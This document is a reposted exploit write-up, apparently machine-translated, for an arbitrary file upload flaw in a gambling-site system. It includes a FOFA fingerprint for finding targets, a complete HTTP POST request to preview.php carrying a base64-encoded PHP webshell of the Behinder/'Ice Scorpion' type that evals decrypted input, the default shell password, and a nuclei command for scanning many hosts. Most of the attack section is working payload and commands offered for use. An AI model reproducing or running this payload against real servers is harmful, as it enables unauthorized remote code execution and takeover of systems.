Title: A certain spinach arbitrary file upload vulnerability

0x01 Vulnerability Description Network dubo refers to gambling activities conducted through Internet means (illegal dubo websites, spinach Apps, WeChat groups, etc.). Because the online dubo is illegal and the funds are not protected by law, there are many "scam-making" behaviors. Many people often dare not call the police after being cheated, resulting in the destruction of their families. Therefore, it is urgent to crack down on dubo. There is a vulnerability to upload any file in a certain spinach system. The attacker can upload Trojan files through the vulnerability, resulting in the server being lost.

0x02 vulnerability recurrence fofa: body='main.e5ee9b2df05fc2d310734b11cc8c911e.css'

1. Execute POC, upload the Ice Scorpion Horse, and return to the upload path

POST //statics/admin/webuploader/0.1.5/server/preview.php HTTP/2Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User:1If-Modified-Since: Mon, 05 Sep 2022 01:19:50 GMTIf-None-Match: '63154eb6-273'Te: trailersContent-Type: application/x-www-form-urlencodedContent-Length: 746data:image/php;base64,PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnR zKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewog ICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBv c3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==s

2. Ice scorpion connects to get a webshell

Ice Scorpion default connection password: rebeyond

3.nuclei batch verification script has been published on Knowledge Planet (there are many assets) nuclei.exe -t bocaijngj_upload.yaml -l subs.txt -stats

Reprinted in the original link: https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==mid=2247486261idx=1sn=2ea324e5b3b895bd500a509bd15ae90fchksm=c184dfe2f6f356f47a5f80d045fac890227a508488b23898482ce4f9daa91fecc54d2f83629scene=178cur_album_id=2581677939042598912#rd